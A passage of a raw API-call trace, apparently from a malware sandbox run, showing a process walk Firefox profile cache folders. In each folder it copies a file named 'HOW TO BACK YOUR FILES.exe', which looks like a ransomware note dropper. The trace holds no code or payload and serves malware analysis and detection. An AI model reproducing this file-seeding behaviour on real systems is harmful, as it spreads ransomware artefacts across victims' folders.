FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.596] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.597] GetLastError () returned 0x0 [0104.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.597] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.597] CloseHandle (hObject=0x120) returned 1 [0104.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d98cd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d98cd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.597] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.597] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" [0104.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f50b0 | out: hHeap=0x2b0000) returned 1 [0104.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.597] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned 111 [0104.597] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" [0104.597] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.597] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.598] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.598] GetLastError () returned 0x0 [0104.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.598] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.598] CloseHandle (hObject=0x120) returned 1 [0104.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.599] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d98cd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d98cd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.599] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.599] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.599] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" [0104.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6de0 | out: hHeap=0x2b0000) returned 1 [0104.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0104.599] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned 114 [0104.599] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" [0104.599] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.599] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.600] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.600] GetLastError () returned 0x0 [0104.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.600] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.600] CloseHandle (hObject=0x120) returned 1 [0104.600] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.600] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7d7ec50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bbb9580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bbb9580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.600] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.600] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.601] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" [0104.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0104.601] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned 114 [0104.601] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" [0104.601] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.601] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.601] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.602] GetLastError () returned 0x0 [0104.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.602] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.602] CloseHandle (hObject=0x120) returned 1 [0104.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.602] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826bbed0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bbdf6e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bbdf6e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.602] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.602] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.602] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" [0104.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.602] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned 114 [0104.602] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" [0104.602] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.603] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.603] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.603] GetLastError () returned 0x0 [0104.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.603] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.604] CloseHandle (hObject=0x120) returned 1 [0104.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.604] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.604] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7680bb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bbdf6e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bbdf6e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.604] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.604] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.604] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" [0104.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0104.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0104.604] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned 111 [0104.604] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" [0104.604] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.604] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.605] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.605] GetLastError () returned 0x0 [0104.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.605] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.605] CloseHandle (hObject=0x120) returned 1 [0104.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.605] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d9b2e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9b2e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.605] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.605] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.606] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" [0104.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.606] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned 114 [0104.606] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" [0104.606] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.606] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.607] GetLastError () returned 0x0 [0104.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.607] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.607] CloseHandle (hObject=0x120) returned 1 [0104.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81eff750, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bc05840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc05840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.607] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.607] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.607] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" [0104.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 